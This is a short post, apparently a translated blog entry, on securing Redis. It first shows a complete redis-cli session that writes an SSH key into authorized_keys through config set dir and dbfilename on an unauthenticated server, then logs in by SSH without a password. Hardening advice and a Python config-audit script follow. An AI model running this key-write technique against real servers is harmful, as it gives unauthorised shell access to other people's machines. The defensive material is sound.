If you are careless when using Redis, it is very easy for someone to get a shell...
When Redis is first deployed in production, a lot of issues go unnoticed. It is easy to leave a hole that gives someone a chance to get a shell.
xxx@debian:~/bash$ redis-cli -h 47.89.xx.xx -p 6379
47.89.xx.xx:6379>
47.89.xx.xx:6379>
47.89.xx.xx:6379> ls
(error) ERR unknown command 'ls'
47.89.xx.xx:6379> config set dir /root/.ssh/
(error) ERR Changing directory: Permission denied
47.89.xx.xx:6379> config set dir .
OK
47.89.xx.xx:6379> config set dir ~/.sh/
(error) ERR Changing directory: No such file or directory
47.89.xx.xx:6379> config set dir ~/.ssh/
(error) ERR Changing directory: No such file or directory
47.89.xx.xx:6379> config set dir .
OK
47.89.xx.xx:6379> config set dbfilename authorized_keys
OK
47.89.xx.xx:6379> set xxx "\n\n\nssh-rsa zzzzzzzzzzzzzzzzzzzzzz\n\n\n"
OK
47.89.xx.xx:6379> save
47.89.xx.xx:6379> config set dir /home/wwwroot/default/
(error) ERR Changing directory: No such file or directory
OK
47.89.xx.xx:6379> config set dir /home/seller_center/
OK
47.89.xx.xx:6379> config set dbfilename authorized_keys
OK
47.89.xx.xx:6379> set xxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4+kLQi93luRmXe4a9zR9iaqKrwuzKdSWjWmrkVP68cEdFfeDhrPTPQJq3VHGu9J4NrS8eSJwiPHJGUfy8VIe4W\n\n\n"
OK
47.89.xx.xx:6379> save
OK
47.89.xx.xx:6379> exit
xxxx@debian:~/bash$ ssh seller_center@47.89.xx.xx
Last login: Tue Jan 17 10:45:46 2017 from 119.xx.xx.xx
Welcome to aliyun Elastic Compute Service!
[seller_center@iZ629adohbqZ ~]$
Right: logged in without knowing the user's password at all.
Most newcomers make this mistake. Fortunately, Redis was not started as root at the time...
Try not to start Redis as root.
Edit the config file: where possible, change port 6379 to another port such as 7890; if remote access is not needed, use bind to restrict it to 127.0.0.1.
Add a password.
The config file contains a line requirepass foobared (foobared is the password).
Then accessing from the terminal is: redis-cli -h 127.0.0.1 -p 7890 -a foobared
Accessing from Django:
BROKER_URL = 'redis://:password@127.0.0.1:7890/0'
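As an added example, not code from the post, here is a small Python audit that parses a redis.conf and reports the three weaknesses the post fixes: no requirepass, a bind open to all interfaces, and the default port 6379. The two sample configs are constructed, and the 'foobared' check assumes the commented-out sample line shipped in the stock redis.conf.

```python
"""Added example (not the post's own code): audit a redis.conf for the three
weaknesses the post fixes: no requirepass, all-interface bind, default port."""
DEFAULT_PORT = "6379"
STOCK_SAMPLE_PASSWORD = "foobared"  # commented-out sample in the stock redis.conf


def parse_redis_conf(text):
    """Return {directive: [args]}, skipping blanks and comments; a later line
    overrides an earlier one for the same directive, as redis-server does."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf[parts[0].lower()] = parts[1:]
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means all three checks pass."""
    conf = parse_redis_conf(text)
    findings = []
    binds = conf.get("bind", [])
    # No bind line means every interface; 0.0.0.0, * and :: mean the same.
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listens on all interfaces; use 'bind 127.0.0.1' "
                        "unless remote clients really need access")
    port = conf.get("port", [DEFAULT_PORT])
    if not port or port[0] == DEFAULT_PORT:
        findings.append("port: default 6379; scanners try it first, use another")
    pw = conf.get("requirepass", [])
    password = pw[0].strip('"') if pw else ""
    if password == "":
        findings.append("requirepass: not set; any client reaching the port can "
                        "run CONFIG SET dir/dbfilename and SAVE")
    elif password == STOCK_SAMPLE_PASSWORD:
        findings.append("requirepass: still the sample value 'foobared'")
    return findings


# Constructed samples: a fresh install with the stock comments, and the post's fix.
WEAK_CONF = """
port 6379
# bind 127.0.0.1
# requirepass foobared
"""
HARDENED_CONF = """
port 7890
bind 127.0.0.1
requirepass example-only-replace-with-a-long-random-secret
"""
```

Running audit_redis_conf over the weak sample yields one finding per recommendation in the post, and the hardened sample yields none.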